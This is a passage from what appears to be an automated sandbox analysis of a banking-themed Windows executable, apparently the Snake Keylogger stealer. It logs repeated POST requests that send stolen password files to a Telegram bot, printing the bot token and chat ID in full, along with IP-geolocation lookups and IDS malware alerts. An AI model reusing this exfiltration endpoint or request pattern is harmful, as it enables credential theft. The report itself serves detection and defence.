          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1898e07eb2d9Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1d2dde54b38aHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2027b47c0eb6Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd209f198ce1baHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20f886ea4178Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2149b2ae10d0Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd219aca851858Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21ea63fb68b5Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd233ff480d1daHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd255075071724Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd25a234bda77dHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd27c57fab271eHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd28221ff8370aHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2b66a646ef5eHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2bc42932ad12Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2c1a7f74b2f8Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2c6ca5788953Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2cc6e02204b6Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2d1fca514654Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2d717dba3193Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2dc74955c8b5Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2e1cdf96e4e5Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2e6e4e5efebaHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2ebe433fc515Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2f544035f056Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2fa3ef5c2ea3Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2fedc67efc9aHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd30415be88ecaHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd30a110097438Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd30e405b75cd1Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd314fd3a84e94Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31964ffbcd94Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31e95a6b71ccHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd323ab1ca858bHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32981e727536Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32ed8188ef90Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdde8837636f9Host: api.telegram.orgContent-Length: 547
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 188.114.96.3:443
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcde95f4d401cdHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741070002.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1747910042.00000000059C9000.00000004.00000020.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
